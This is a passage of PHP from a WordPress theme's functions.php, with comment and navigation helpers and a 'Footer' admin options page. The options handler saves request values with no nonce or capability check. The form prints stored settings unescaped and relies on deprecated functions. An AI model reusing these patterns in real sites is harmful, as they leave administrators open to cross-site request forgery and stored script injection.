		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Save changes" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
